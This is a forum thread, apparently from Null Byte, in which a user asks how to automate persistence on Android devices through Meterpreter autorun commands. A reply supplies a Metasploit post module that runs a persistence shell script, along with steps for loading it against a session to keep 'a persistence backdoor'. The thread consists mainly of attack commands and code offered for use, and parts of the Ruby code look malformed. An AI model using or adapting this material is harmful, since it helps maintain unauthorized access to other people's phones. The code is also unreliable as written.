Forum Thread: How to Autorun Android Command Through Shell in Meterpreter?

I've been at this for days to no avail, I'm having issues with automating persistence within android on connection of a meterpreter session.

I've been playing around with the information at this link https://offensiveinfosec.wordpress.com/tag/autorunscript/, quite successfully I might add. however, the issue arises when I try to drop in to a shell and run commands on that shell within android.

The target is to upload a .sh file on connection, drop to a shell and then execute this command. The automation gets as far as "shell 1 process created" then ends. It's driving me up the wall.

Here is what I have written in my command file;

cd /
cd /sdcard/download
upload /root/Desktop/AndroidAutorun/Dn30.sh
shell
cd /
cd /sdcard/Download
sh Dn30.sh

As I mentioned, it executes flawlessly until shell, then nothing happens.

I'm relatively new to linux commands and am learning as I go along, please forgive me if its unbelievably obvious. Does anybody have any idea what I'm missing?

Our Best Hacking & Security Guides

New Null Byte posts — delivered straight to your inbox.

2 Responses

Have you resolved the issue? I'm facing the same problem

I think i might have a solution to the problem
i created a post android module
touch postmodule.rb
copy it to the metasploit source directory
cp postmodule /usr/share/metasploit-framework/modules/post/android/manage/
now paste this code into the postmodule.rb file in the metasploit folder

class MetasploitModule < Msf::Post
include Msf::Post::Common

def initialize(info={})
super( update_info( info, {
'Name' => "script_runner",
'Description' => %q{
This module runs any .sh script on android using android shell
},
'License' => MSF_LICENSE,
'Author' => 'Anonymous' ,
'SessionTypes' => 'meterpreter',
'Platform' => 'android',
}
))
end

def run
print_status("Running persistence script")
cmd_exec("sh /sdcard/persistence.sh")
end

print_status("You now have a persistence backdoor")
end
end

notice in the code you need to name the file persistence.sh and upload to /sdcard before you run the post module

now when that is finish you:
backgroung the meterpreter session by running
background
run the post module by
use post/android/manage/postmodule.rb
set session <metasploit sessions>
to know your metasploit session type
sessions
finnally run the post module by typing
run

you could write the .rc file to automatically background the sessions and run the post module, i am suspecting that you already know this. I had this same problem and didnt know what to do then i wondered how does metasploit run post module. I checked out one of the post module script, having prior programming knowledge of python i was able to understand the ruby code, anyways what i understand is that in the common.rb file there is a class i cant remember but it has the cmd_exe method. Im not sure, but I think this method guess the kind of meterpreter sessions you have either android or windows and then i create a channel of some sort not sure maybe someone could explain. Anyways with this, you could run any non root comamand. this was very simple but the point is you just have to read and understand. I think i will do some forther researching to add rooted command. I think there is another file or class called :priv which will do this im not sure.

OH BTW i created this account with temp mail so i dont know if this post will last lol

Share Your Thoughts

  • Hot
  • Active